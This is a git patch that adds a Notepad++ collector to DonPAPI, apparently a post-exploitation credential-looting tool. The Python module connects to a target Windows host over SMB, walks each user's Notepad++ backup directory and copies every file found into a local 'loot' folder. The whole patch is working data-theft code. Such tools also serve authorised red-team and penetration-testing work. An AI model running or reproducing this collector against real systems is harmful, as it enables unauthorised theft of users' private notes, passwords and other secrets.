From 1afae5f083798cc5cb36fedfd594cc3173c870b0 Mon Sep 17 00:00:00 2001 From: Deft_ Date: Thu, 17 Oct 2024 15:27:14 +0200 Subject: [PATCH] Create notepadpp.py --- donpapi/collectors/notepadpp.py | 61 +++++++++++++++++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 donpapi/collectors/notepadpp.py diff --git a/donpapi/collectors/notepadpp.py b/donpapi/collectors/notepadpp.py new file mode 100644 index 0000000..39d2a4b --- /dev/null +++ b/donpapi/collectors/notepadpp.py @@ -0,0 +1,61 @@ +import os +import ntpath +from typing import Any +from dploot.lib.target import Target +from dploot.lib.smb import DPLootSMBConnection +from donpapi.core import DonPAPICore +from donpapi.lib.logger import DonPAPIAdapter + + +TAG = "NotepadPP" + +class NotepadPPDump: + false_positive = [".", "..", "desktop.ini", "Public", "Default", "Default User", "All Users", ".NET v4.5", ".NET v4.5 Classic"] + user_directories = ["Users\\{username}\\AppData\\Roaming\\Notepad++\\backup\\"] + max_filesize = 5000000 + + def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: list, options: Any, logger: DonPAPIAdapter, context: DonPAPICore) -> None: + self.target = target + self.conn = conn + self.masterkeys = masterkeys + self.options = options + self.logger = logger + self.context = context + self.found = 0 + + def run(self): + + self.logger.display("Gathering notepad++ backup files") + for user in self.context.users: + for directory in self.user_directories: + directory_path = directory.format(username=user) + self.dig_files(directory_path=directory_path, recurse_level=0, recurse_max=10) + self.logger.secret(f"Found {self.found} notepad++ backup files", TAG) + + def dig_files(self, directory_path, recurse_level=0, recurse_max=10): + directory_list = self.conn.remote_list_dir(self.context.share, directory_path) + if directory_list is not None: + for item in directory_list: + if item.get_longname() not in self.false_positive: + self.found += 1 + new_path = ntpath.join(directory_path, item.get_longname()) + file_content = self.conn.readFile(self.context.share, new_path) + local_filepath = os.path.join(self.context.output_dir, *(new_path.split('\\'))) + # Stores the file in loot\TARGET\Users\{username}\AppData\ + os.makedirs(os.path.dirname(local_filepath), exist_ok=True) + with open(local_filepath, "wb") as f: + if file_content is None: + file_content = b"" + f.write(file_content) + + # Stores files in loot\PowerShellHistory + os.makedirs(f"{self.context.output_dir}/../NotepadPP", exist_ok=True) + local_filepath = os.path.join( + f"{self.context.output_dir}/../NotepadPP", + f"{item.get_longname()}-{self.found}" + ) + with open(local_filepath, "wb") as f: + if file_content is None: + file_content = b"" + f.write(file_content) +